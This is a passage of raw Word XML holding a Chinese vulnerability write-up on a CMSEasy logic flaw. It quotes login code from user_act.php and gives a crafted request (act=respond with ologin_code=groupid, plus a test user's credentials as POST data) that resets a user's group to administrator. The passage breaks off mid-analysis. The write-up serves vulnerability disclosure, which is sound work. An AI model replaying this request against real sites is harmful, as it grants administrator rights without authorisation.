          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="12"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体"/>
          <w:sz w:val="15"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:before="1" w:line="355" w:lineRule="auto"/>
        <w:ind w:left="417" w:right="464"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>cmseasy</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>逻辑缺陷可升级普通用户为管理</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>员</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:before="241"/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menmen519</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="64"/>
        <w:ind w:left="417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
        </w:rPr>
        <w:t>user_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
        </w:rPr>
        <w:t>act.php(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
        </w:rPr>
        <w:t>130-155):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
          <w:sz w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:pict>
          <v:shape id="_x0000_s8795" type="#_x0000_t202" style="position:absolute;margin-left:80.7pt;margin-top:18.6pt;width:337.5pt;height:230.15pt;z-index:536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(front::post('submit'))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734" w:firstLine="120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(front::post('username') &amp;&amp; front::post('password')) {</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:ind w:left="1779" w:right="50"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$username = front::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'username');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980" w:firstLine="1598"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t xml:space="preserve">$password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md5(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:w w:val="95"/>
                    </w:rPr>
                    <w:t>front::post('password'));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779" w:right="50"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t xml:space="preserve">$data = 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 w:line="391" w:lineRule="auto"/>
                    <w:ind w:left="2180" w:right="1657"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>'</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>username</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>' =&gt; $username, 'password' =&gt;</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> $password,</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:ind w:left="1779" w:right="50"/>
                  </w:pPr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1779" w:right="50"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t xml:space="preserve">$user = new </w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>user(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1779" w:right="50"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$row = $user-&gt;</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>getrow(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>array('username' =&gt;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'username'], 'password' =&gt; $data['password']));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Verdana"/>
          <w:sz w:val="27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8794" type="#_x0000_t202" style="width:337.5pt;height:360.5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779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(!is_array($row)) {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2180" w:right="2019"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$this-&gt;login_</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>false(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>); return;</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="2"/>
                    <w:ind w:left="17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662" w:firstLine="1598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$classname] = session::get('openid');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1216" w:firstLine="1598"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$this-&gt;_user-&gt;rec_</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>update(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$post, 'userid=' . $</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>row[</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>'userid']);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779" w:right="50"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>cookie::</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>set(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>'login_username',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row[</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>'username']);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457" w:firstLine="1598"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>cookie::</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>set(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>'login_password', front::cookie_encode($row['password']));</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:ind w:left="1779" w:right="50"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>session::</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>set(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>'username',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row[</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>'username']);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779" w:right="50"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:w w:val="95"/>
                    </w:rPr>
                    <w:t>front::</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:w w:val="95"/>
                    </w:rPr>
                    <w:t>redirect(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:w w:val="95"/>
                    </w:rPr>
                    <w:t>url::create('us</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:w w:val="95"/>
                    </w:rPr>
                    <w:t xml:space="preserve">er')); </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>return;</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:ind w:left="1380" w:right="50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779" w:right="2420"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$this-&gt;login_</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>false(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>); return;</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:ind w:left="13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line="238" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>第一步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注册一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>为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test </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>密</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>码为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:spacing w:val="-57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111111 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>的用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>户</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="10"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体"/>
          <w:sz w:val="27"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:line="304" w:lineRule="auto"/>
        <w:ind w:left="417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>然后</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>发</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>送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Verdana" w:eastAsia="Verdana"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>url</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId63">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
            <w:w w:val="95"/>
            <w:sz w:val="21"/>
          </w:rPr>
          <w:t>http://localhost/uploads/index.php?case=user&amp;act=respon</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
          <w:w w:val="95"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>d&amp;ologin_code=groupid</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
          <w:sz w:val="27"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:line="307" w:lineRule="auto"/>
        <w:ind w:left="417" w:right="1113"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>postdata</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
          <w:w w:val="95"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>username=test&amp;password=111111&amp;submit=xxx</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
          <w:sz w:val="23"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:before="1"/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第二步：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:before="93"/>
        <w:ind w:left="417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>$</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>post[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>$classname] = session::get('openid');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Verdana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spacing w:before="92" w:line="268" w:lineRule="auto"/>
        <w:ind w:left="417" w:right="1196"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>这里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MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>我</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>们给</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">$post </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>传递进去了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Verdana" w:eastAsia="Verdana"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">groupid </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>但是有个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>问题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Verdana" w:eastAsia="Verdana"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>session::</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>get(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">'openid') </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>并不存在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MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>所以</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>执</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>行后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Verdana" w:eastAsia="Verdana"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">test </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>户</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>的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Verdana" w:eastAsia="Verdana"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">groupid </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>为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Verdana" w:eastAsia="Verdana"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:before="6"/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那么下来我</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>们</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>继续</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>找一下</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:pict>
          <v:shape id="_x0000_s8793" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:80.7pt;margin-top:19.35pt;width:337.5pt;height:360.55pt;z-index:541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include_once</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/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color w:val="333333"/>
                      <w:w w:val="95"/>
                    </w:rPr>
                    <w:t>ROOT.'/lib/plugins/ologin/'</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:w w:val="95"/>
                    </w:rPr>
                    <w:t>.$</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:w w:val="95"/>
                    </w:rPr>
                    <w:t>classname.'.</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:w w:val="95"/>
                    </w:rPr>
                    <w:t>php</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:w w:val="95"/>
                    </w:rPr>
                    <w:t>';</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:ind w:left="980" w:right="50"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$ologinobj = new $</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>classname(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4"/>
                    <w:ind w:left="980" w:right="50"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$status = $ologinobj-&gt;</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>respond(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//var_</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>dump(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>session::get('openid'));exit;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980" w:right="447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where[</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$classname] = session::get('openid'); if(!$where[$classname])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front::</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>redirect(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>url::create('user'));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 xml:space="preserve">$user = new </w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>user(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980" w:right="2134"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$dat</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>a = $user-&gt;</w:t>
                  </w:r>
